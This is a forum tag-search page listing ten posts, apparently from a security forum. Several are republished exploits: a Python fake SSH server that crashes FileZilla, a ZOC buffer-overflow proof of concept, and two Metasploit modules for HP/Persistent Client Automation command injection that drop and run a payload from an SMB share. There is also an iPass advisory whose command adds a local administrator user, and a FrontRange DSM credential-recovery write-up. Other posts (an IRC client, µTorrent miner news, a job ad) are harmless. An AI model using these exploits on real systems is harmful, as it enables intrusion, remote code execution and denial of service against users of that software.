Showing results for tags 'client'.

Found 10 results

  1. Hi guys, I know the title must sound obsolete for ya, but I've seen in the past Romanian managed to "hack" a previous version of this game: https://world.triviador.net. The security has changed since then, and I'm wondering if there's anyone that can still make an XML grabber for it. From what I know, if you search "sharedkey" or "rsapublickey" with a memory viewer through Firefox, for example, you can see a huge key. I believe that RSA key is used to encrypt the key used for decrypting the XML. Anyway, I have managed to write the actual decryption algorithm for decoding the XML, and maybe for decoding the key too, but I can't get the encrypted key out of the memory of any browser. I'm curious if anyone could do that. =] ~ Cheers ~
  2. # Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability # Date: 5-6-2015 # Vendor homepage: http://www.chiark.greenend.org.uk # Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe # Version: 3.11.0.2 # Author: 3unnym00n # Details: # -------- # sftp module for filezilla based on putty's psftp component. # when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash # Tested On: win7, xp # operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1 ''' import socket import struct soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('127.0.0.1', 22)) soc.listen(1) client, addr = soc.accept() ## do banner exchange ## send server banner client.send('SSH-2.0-SUCK\r\n') ## recv client banner client_banner = '' while True: data = client.recv(1) if data == '\x0a': break client_banner += data print 'the client banner is: %s'%client_banner.__repr__() ## do key exchange ## recv client algorithms str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send server algorithms 
client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex')) ## do dh key exchange ## recv dh group exchange request str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange group client.send('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'.decode('hex')) ## recv dh group exchange init str_pl = client.recv(4) pl = struct.unpack('>I', str_pl)[0] client.recv(pl) ## send dh group exchange reply dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl dh_gex_reply_msg += '\x09' ## padding len dh_gex_reply_msg += '\x21' ## dh gex reply dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len dh_gex_reply_msg += 'A'*600 client.sendall(dh_gex_reply_msg) Source: https://dl.packetstormsecurity.net/1506-exploits/filezilla-dos.txt
  3. """
     # Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)
     # Date: 20-5-2015
     # Vendor homepage: www.emtec.com
     # Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html
     # Author: Dolev Farhi
     # Details:
     # --------
     # Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the
     # server address and attempt to connect.
     """
     #!/usr/bin/python
     filename="zoc.txt"
     buffer = "\x41" * 97
     textfile = open(filename , 'w')
     textfile.write(buffer)
     textfile.close()

     Source
  4. Security vulnerabilities in the Client Management Software FrontRange DSM can be leveraged in attacks against corporate networks. Client management is a very important task in modern enterprise IT environments as all computer systems, whether client or server, should be managed throughout their entire system life cycle. There are many client management software solutions from different vendors that support IT managers and IT administrators in client management tasks like: • inventory • patch management • software deployment • license management As a matter of principle, in order to perform these functions, client management software requires high privileges, usually administrative rights, on the managed client and server systems. Therefore, client management software is an interesting target for attackers as vulnerabilities in this kind of software may be leveraged for privilege escalation attacks within corporate networks. During a penetration test of client and server systems of a corporate network, the SySS GmbH could find multiple security vulnerabilities in the client management software FrontRange Desktop & Server Management (DSM) v7.2.1.2020 [1] that could be successfully exploited in a privilege escalation attack resulting in administrative privileges for the entire Windows domain. Security Assessment During a security assessment of a client system managed with FrontRange DSM, the SySS GmbH found out that the client management solution FrontRange DSM stores and uses sensitive user credentials for required user accounts in an insecure manner which enables an attacker or malware with file system access to a managed client, for example with the privileges of a limited Windows domain user account, to recover the cleartext passwords. 
The recovered passwords can be used for privilege escalation attacks and for gaining unauthorized access to other client and/or server systems within the corporate network as at least one FrontRange DSM user account needs local administrative privileges on managed systems. FrontRange DSM stores passwords for different user accounts encrypted in two configuration files named NiCfgLcl.ncp and NiCfgSrv.ncp. These configuration files contain encrypted password information for different required FrontRange DSM user accounts (see [2]), for example: • DSM Runtime Service • DSM Distribution Service • Business Logic Server (BLS) Authentication • Database account The actual number of required FrontRange DSM user accounts depends on the chosen security level during the software installation as Figure 1 illustrates. A limited Windows domain user has read access to these configuration files that are usually stored in the following locations: • %PROGRAMFILES(X86)\NetInst\NiCfgLcl.ncp (local on a managed client) • %PROGRAMFILES(X86)\NetInst\NiCfgSrv.ncp (local on a managed client) • \\<FRONTRANGE SERVER>\DSM$\NiCfgLcl.ncp (remote on a DSM network share) • \\<FRONTRANGE SERVER>\DSM$\NiCfgSrv.ncp (remote on a DSM network share) An analysis of the used encryption method by the SySS GmbH showed, that the passwords are encoded and encrypted using a hard-coded secret (cryptographic key) contained within the FrontRange DSM executable file NiInst32.exe. Furthermore, the SySS GmbH found out that the process NiInst32.exe, that is executed in the context of a low-privileged user, decrypts and uses some of the user credentials contained in the FrontRange DSM configuration files. Thus, an attacker or malware running in the same low-privileged user context can analyze and control the process NiInst32.exe and in this way gain access to decrypted cleartext passwords. 
For instance, such an online attack targeting the running process NiInst32.exe can be performed using an application-level debugger like OllyDbg [3] from the perspective of a limited Windows user. Figure 2 exemplarily shows the successful extraction of the decrypted cleartext password of the FrontRange DSM user account DSM Distribution Service. In order to gain ac Read more: https://www.exploit-db.com/docs/36872.pdf
  5. I made an IRC client specifically for the #rstforums channel on freenode. You have to log in with your forum username and password (I did this to prevent spam, to know who is who, etc.). You need .NET Framework 4.5 installed to run the program. Screenshots: Login form: Main form: What it can do: - Login based on the forum account - Nice-looking design - Sound when a message is received - The taskbar icon blinks when a message is received - Sending a message by pressing the Enter key in the textbox Existing bugs: - Sometimes crashes when the program is closed. - The windows are named Form1/Form2, I forgot to change the names. If you find other bugs, please report them. Download: IRC Client.exe — RGhost — file sharing Virus scan: https://www.virustotal.com/en/file/aca49cfc58dd5be22e9d2ac25ba08b2e8d66e670fd542a94a27cd7e4b0b0bba6/analysis/1427018283/ Update 1: - you can log in with usernames that contain dots - notification when a user leaves/joins/changes their nick
  6. Mogwai Security Advisory MSA-2015-03
     ----------------------------------------------------------------------
     Title: iPass Mobile Client service local privilege escalation
     Product: iPass Mobile Client
     Affected versions: iPass Mobile Client 2.4.2.15122 (Newer version might be also affected)
     Impact: medium
     Remote: no
     Product link: http://www.ipass.com/laptops/
     Reported: 11/03/2015
     by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)

     Vendor's Description of the Software:
     ----------------------------------------------------------------------
     The iPass Open Mobile client for laptops is lightweight and always on. It provides easy, seamless connectivity across iPass, customer, and third-party networks, and allows you to mix and match carrier networks without disrupting your users. The iPass Open Mobile client for laptops allows organizations to provide granular options for how employees connect to iPass Wi-Fi (the iPass Mobile Network), campus Wi-Fi, mobile broadband (3G/4G), Ethernet, and dial, using a single platform to manage all connections. Open Mobile also enables cost and security controls that provide virtual private network (VPN) integration options; mobile broadband 3G/4G usage controls for both data roaming and data usage; endpoint integrity verification that checks the security of the device at the point of connection; and several additional options for setting network connection and restriction policies. Insight into an organizations mobility usage is provided through user and device activity and summary reports as well as mobile broadband usage reports.

     Vendor response:
     ----------------------------------------------------------------------
     "We do not consider this a vulnerability as it is how the product was designed"

     Business recommendation:
     ----------------------------------------------------------------------
     Disable the iPass service unless really required

     -- CVSS2 Ratings ------------------------------------------------------
     CVSS Base Score: 5.6
     Impact Subscore: 7.8
     Exploitability Subscore: 3.9
     CVSS v2 Vector (AV:L/AC:L/Au:N/C:P/I:C/A:N)

     Vulnerability description:
     ----------------------------------------------------------------------
     The iPass Open Mobile Windows Client utilizes named pipes for interprocess communication. One of these pipes accepts/forwards commands to the iPass plugin subsystem. A normal user can communicate with this pipe through the command line client EPCmd.exe which is part of the iPass suite. A list of available commands can be displayed via "System.ListAllCommands". The iPass pipe provides a "iPass.EventsAction.LaunchAppSysMode" command which allows to execute arbitrary commands as SYSTEM. This can be abused by a normal user to escalate his local privileges. Please note that this issue can also be exploited remotely in version 2.4.2.15122 as the named pipe can also be called via SMB. However according to our information, the pipe is no longer remotely accessible in current versions of the iPass Mobile client.

     Proof of concept:
     ----------------------------------------------------------------------
     The following EPCmd command line creates a local user "mogwai" with password "mogwai":

     EPCmd.exe iPass.EventsAction.LaunchAppSysMode c:\windows\system32\cmd.exe;"/c net user mogwai mogwai /ADD;;

     Disclosure timeline:
     ----------------------------------------------------------------------
     10/03/2015: Requesting security contact from iPass sales
     10/03/2015: Sales responded, will forward vulnerability information to the development
     11/03/2015: Sending vulnerability details
     11/03/2015: iPass asks which customer we represent
     11/03/2015: Responding that we don't represent any iPass customer
     12/03/2015: iPass responded, wont fix, says that the product works as designed

     Advisory URL:
     ----------------------------------------------------------------------
     https://www.mogwaisecurity.de/#lab

     ----------------------------------------------------------------------
     Mogwai, IT-Sicherheitsberatung Muench
     Steinhoevelstrasse 2/2
     89075 Ulm (Germany)
     info@mogwaisecurity.de

     Source
  7. BitTorrent apologizes for Epic Scale crypto-miner installed with µTorrent torrent client with after user outrage

     BitTorrent apologizes for Epic Scale Bitcoin mining software that users say was shadily installed µTorrent torrent client, offers an uninstall guide

     BitTorrent the maker of widely popular µTorrent torrent client came under severe fire from all quarters for bundling the popular with cryptocurrency mining software with the µTorrent torrent client. BitTorrent was not only criticised on different websites but also on its own µTorrent forum with users blasting it for installing the Epic Scale cryptocurrency miner without asking users for permission or warning them about it.

     Under the unrelenting barrage of criticism, BitTorrent today apologized to its µTorrent torrent client users. Writing on the µTorrent forum, a member of BitTorrent staff said that they had paused the installation of Epic Scale software with µTorrent client.

     We understand the concerns that have been raised about our partner offer with Epic Scale. Amid user feedback, on Friday, mid-day we paused the offer to allow time for us to do an evaluation.

     For users who already installed the Epic Scale software with µTorrent client and want to remove it conventionally, you are requested to visit the uninstall guide site here. BitTorrent also clarified that the Epic Scale software was shipped only with the Windows client and therefore Linux and Mac machines are not affected by this cryptomining software. BitTorrent however tried to muzzle the claims that the software itself was bad and went on to give a detailed reasoning for shadow installing the Epic Scale software.

     “There have been a lot of claims over the past few days, some of them fair and some pretty wild. We have always invited an open and constructive dialogue, particularly through our forums, and want that to continue.”

     “As we’ve discussed in the past, partner offers are one of the ways we generate revenue. Many of you already understand that this is a common model for software companies that provide products and technology for free. Our policy is that these offers are strictly optional and we have never done a silent install; in fact, we built our installer technology to make silent installs impossible. The offers we choose and how we present them are something we strive to get right, and we think we’ve been mostly successful over the last four years.”

     “That being said – from the feedback we’ve received, it is clear that we misjudged how users would react to this offer; this software is truly different from our previous offers and therefore deserves special attention. For this, we unequivocally apologize to our affected users.”

     The µTorrent client were however not happy with the apology. A poster on the forum demanded the BitTorrent should permanently stop such installations while another asked BitTorrent to consider the damage it may have cost, “I may ask that for the next set of offers that full testing be done to ensure that zero threats of malware/adware/spyware is given free reign over the client’s system. Meaning, a system set up that a normal person would use with a normal AV program. Once the package is installed, an array of mal/spy/adware cleaners are put to work to see how deep these packages go and how they are treated by the cleaners. This situation would pale in comparison if a genuine threat was unleashed by accident.”

     SOURCE: BitTorrent apologizes for Epic Scale crypto-miner installed with µTorrent torrent client with after user outrage

     It seems it isn't from adware and other programs installed by mistake because you forget or don't notice to uncheck them when you install utorrent.
  8. # Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
     # Date: 2014-10-01
     # Exploit Author: Ben Turner
     # Vendor Homepage: Previously HP, now http://www.persistentsys.com/
     # Version: 7.9, 8.1, 9.0, 9.1
     # Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
     # CVE-2015-1497
     # CVSS: 10

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = ExcellentRanking

       # Exploit mixins should be called first
       include Msf::Exploit::Remote::SMB
       include Msf::Exploit::EXE
       include Msf::Auxiliary::Report

       # Aliases for common classes
       SIMPLE = Rex::Proto::SMB::Client
       XCEPT = Rex::Proto::SMB::Exceptions
       CONST = Rex::Proto::SMB::Constants

       def initialize
         super(
           'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
           'Description' => %Q{
             This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
           },
           'Author' => [ 'Ben Turner' ],
           'License' => BSD_LICENSE,
           'References' => [ ],
           'Privileged' => true,
           'DefaultOptions' =>
             {
               'WfsDelay' => 10,
               'EXITFUNC' => 'process'
             },
           'Payload' => { 'BadChars' => '', 'DisableNops' => true },
           'Platform' => ['win'],
           'Targets' =>
             [
               [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
             ],
           'DefaultTarget' => 0,
           'DisclosureDate' => 'January 10 2014'
         )

         register_options([
           OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
           OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
           Opt::RPORT(3465),
         ], self.class)
       end

       def exploit
         createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
         createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
         createservice << "\x22\x00\x00\x00"

         startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
         startservice << "Nvdkit service start test"
         startservice << "\x22\x00\x00\x00"

         removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
         removeservice << "Nvdkit service remove test"
         removeservice << "\x22\x00\x00\x00"

         def filedrop()
           begin
             origrport = self.datastore['RPORT']
             self.datastore['RPORT'] = 445
             origrhost = self.datastore['RHOST']
             self.datastore['RHOST'] = self.datastore['SMBServer']
             connect()
             smb_login()
             print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...")
             self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
             exe = generate_payload_exe
             fd = smb_open("\\installservice.exe", 'rwct')
             fd << exe
             fd.close
             self.datastore['RPORT'] = origrport
             self.datastore['RHOST'] = origrhost
           rescue Rex::Proto::SMB::Exceptions::Error => e
             print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
             abort()
           end
         end

         def filetest()
           begin
             origrport = self.datastore['RPORT']
             self.datastore['RPORT'] = 445
             origrhost = self.datastore['RHOST']
             self.datastore['RHOST'] = self.datastore['SMBServer']
             connect()
             smb_login()
             print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
             self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
             file = "\\installservice.exe"
             filetest = smb_file_exist?(file)
             if filetest
               print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
             else
               print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")
             end
             self.datastore['RPORT'] = origrport
             self.datastore['RHOST'] = origrhost
           rescue Rex::Proto::SMB::Exceptions::Error => e
             print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")
             abort()
           end
         end

         begin
           filedrop()
           filetest()
           connect()
           sock.put(createservice)
           print_status("Creating the callback payload and installing the remote service")
           disconnect
           sleep(5)
           connect()
           sock.put(startservice)
           print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
           disconnect
           sleep(30)
           connect
           sock.put(removeservice)
           disconnect
         rescue ::Exception => e
           print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
           abort()
         end
       end
     end
  9. ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = GreatRanking

       include Msf::Exploit::Remote::Tcp
       include Msf::Exploit::CmdStager

       def initialize(info = {})
         super(update_info(info,
           'Name' => 'HP Client Automation Command Injection',
           'Description' => %q{
             This module exploits a command injection vulnerability on HP Client Automation, distributed
             actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
             Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither.
             This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2
             and CentOS 5.
           },
           'Author' =>
             [
               'Ben Turner', # Vulnerability discovery
               'juan vazquez' # Metasploit module
             ],
           'References' =>
             [
               ['CVE', '2015-1497'],
               ['ZDI', '15-038'],
               ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
             ],
           'Privileged' => true,
           'Platform' => %w{ unix win },
           'DefaultOptions' =>
             {
               'WfsDelay' => 10
             },
           'Payload' => {'DisableNops' => true},
           'Targets' =>
             [
               [ 'HP Client Automation 9.0.0 / Linux',
                 {
                   'Platform' => 'unix',
                   'Arch' => ARCH_CMD,
                   'Payload' =>
                     {
                       'Space' => 466,
                       'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
                       'Compat' =>
                         {
                           'PayloadType' => 'cmd',
                           'RequiredCmd' => 'openssl telnet generic gawk'
                         },
                       'BadChars' => "\x27"
                     }
                 }
               ],
               [ 'HP Client Automation 9.0.0 / Windows',
                 {
                   'Platform' => 'win',
                   'Arch' => ARCH_X86
                 }
               ]
             ],
           'DefaultTarget' => 0,
           'DisclosureDate' => 'Jan 02 2014'))

         register_options(
           [
             Opt::RPORT(3465)
           ], self.class)

         deregister_options('CMDSTAGER::FLAVOR')
         deregister_options('CMDSTAGER::DECODER')
       end

       def check
         connect
         sock.put("\x00") # port
         sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
         sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
         sock.put("hide\x00") # command
         res = sock.get_once
         disconnect

         if res && res.unpack('C')[0] == 0
           return Exploit::CheckCode::Detected
         end

         Exploit::CheckCode::Safe
       end

       def exploit
         case target['Platform']
         when 'win'
           print_status('Exploiting Windows target...')
           execute_cmdstager({:flavor => :vbs, :linemax => 290})
         when 'unix'
           print_status('Exploiting Linux target...')
           exploit_unix
         else
           fail_with(Failure::NoTarget, 'Invalid target')
         end
       end

       def exploit_unix
         connect
         sock.put("\x00") # port
         sock.put("0\x00") # user ID
         sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
         sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected
         disconnect
       end

       def execute_command(cmd, opts = {})
         connect
         sock.put("\x00") # port
         sock.put("S-1-5-18\x00") # user ID
         sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
         sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
         res = sock.get_once
         disconnect
         unless res && res.unpack('C')[0] == 0
           fail_with(Failure::Unknown, "Something failed executing the stager...")
         end
       end
     end

     Source
  10. Level 1 Remote Software & Hardware Support Specialist

      For a client, Software & Hardware Support Specialists are required to deliver Remote Technical Support Services in English and in client national language
      • Providing initial remote technical software & hardware support to clients
      • Interacting with client and company functions consistently until problem solution
      • Analyzing problems/situations, understanding problem impact on client business
      • Applying problem solving techniques
      • Responding to client queries, providing timely resolutions to client issues
      • Maintaining highest client satisfaction
      • Maintaining positive client relationships even in severe and pressurized situations
      • Performing problem management and end-to-end problem ownership
      • Logging all related activities for each customer query and handling client data securely
      • Employing client's standard support delivery methodologies and tools
      • Performing in international software support delivery processes and environments
      • Participating in shifts: 24X7

      The team's location is Bucharest/Romania. In an initial phase training will be provided to gain client specific product knowledge and getting used to client's software & hardware support processes and tools. This would be provided in Bucharest.

      Requirements

      Traits and competencies wanted
      • Technical
      • Problem solver
      • Excellent communication and listening skills
      • Team player
      • Very good analytical skills
      • Eagerness/willingness to learn
      • Ability to perform under pressure
      • Ability to multi-task
      • Willingness to travel

      Skills and experience wanted
      • Required:
      • English fluent (both written and verbal) -- this is a must
      • Proven remote support know-how (patches etc.)

      Nice to have skills
      Excellent analytic know-how for complex incidents
      • Customer facing experience
      • Team working

      Location Bucharest

      PM your CV